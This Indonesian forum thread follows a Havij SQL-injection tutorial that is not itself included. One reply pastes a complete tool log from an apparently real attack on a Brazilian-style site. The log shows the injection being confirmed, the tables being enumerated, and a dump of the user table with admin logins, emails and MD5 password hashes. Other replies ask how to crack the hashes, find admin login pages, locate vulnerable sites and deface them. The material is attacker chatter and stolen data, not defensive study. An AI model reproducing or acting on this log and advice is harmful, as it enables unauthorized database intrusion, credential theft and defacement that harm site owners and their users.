[Tutorial] SQL Injection menggunakan Havij Vers 1.10

[ayong33]

kok gak bsa gan hash md5.nya...
ad cara laen gak...?

[un4m3d]

kk ..
find admin nya kok gag nemu jg yah, padahal aku udah dapet yg vurn neh
dan dapet semua akses masuknya termasuk login user + pass 'na

Host IP: ***.**.***.**
Web Server: Apache/2.2.14 (Ubuntu)
Powered-by: PHP/5.2.10-2ubuntu6
Keyword Found: p><b
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 5
Finding string column
Valid String Column is 2
Target Vulnerable
Current DB: cecial
Count(table_name) of information_schema.tables Where table_schema=0x63656369616C is 18
Tables found: tbl_arquivos,tbl_banners,tbl_categoria,tbl_email,tbl_emails,tbl_fotogaleria,tbl_imagens,tbl_mala_direta,tbl_menu,tbl_menu_adm,tbl_newsletter,tbl_noticias,tbl_paginas,tbl_status,tbl_submenu,tbl_submenu_adm,tbl_tipos,tbl_usuarios
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F656D61696C is 2
Columns found: id_email,email
Count(*) of cecial.tbl_email is 0
Can not get rows count, trying to get 10 rows
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Turning off 'bypass illegal union' and retrying!
Data Found: email=
Turning on 'bypass illegal union' and retrying!
Data Found: id_email=
Canceling...
Job Canceled!
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F6D656E755F61646D is 4
Columns found: id_menu_adm,item_menu_adm,link_menu_adm,nivel_acesso
Count(column_name) of information_schema.columns Where table_schema=0x63656369616C AND table_name=0x74626C5F7573756172696F73 is 6
Columns found: id_usuario,nome_usuario,email_usuario,nivel_acesso,login_usuario,senha_usuario
Count(*) of cecial.tbl_usuarios is 3
Data Found: login_usuario=admin
Data Found: email_usuario=[email protected]
Data Found: nome_usuario=Administrador
Data Found: senha_usuario=87ed1dc579ed6a53528cea33d75eaed5
Data Found: nivel_acesso=1
Data Found: id_usuario=1
Data Found: login_usuario=jornalista
Data Found: email_usuario=[email protected]
Data Found: nome_usuario=Jornalista
Data Found: senha_usuario=3605fb0da091e9069f6da957932f1789
Data Found: nivel_acesso=2
Data Found: id_usuario=2
Data Found: login_usuario=hamilton
Data Found: email_usuario=[email protected]
Data Found: nome_usuario=Hamilton
Data Found: senha_usuario=b3edb2df76bc59cafe10222b9e9b4223
Data Found: nivel_acesso=1
Data Found: id_usuario=3

[poni]

Kadang admin mengubah nama page login supaya tidak gampang ditemukan oleh pihak luar.

[detta3690]

om mau tanya dong.. kalo webnya gini http://site.com/?
gmn? kan ga ada index php atau semacamnya..ga bisa di analyze dong..

[veronochi]

bagus om tutornya nie...

sayang ya havij untuk windows coba ada versi linuxnya keren dah...

[djisamsoe]

mantabs..bro

[kalil45]

gan ane gak bisa crack MD5 nya untuk menjadi paswor,,
bantuan dan pencerahan di tunggu

[Tobyazx77x]

om poni saya mau nanya nih kan saya mau nge deface web lain udah ketemu admin login nya
tapi cara nyari username and pass nya gimana?
maaf kalo ganggu

[M4d3X]

masih bisa nggk oms?

[ladade]

klo nyari" vulnerablenya gmana caranya?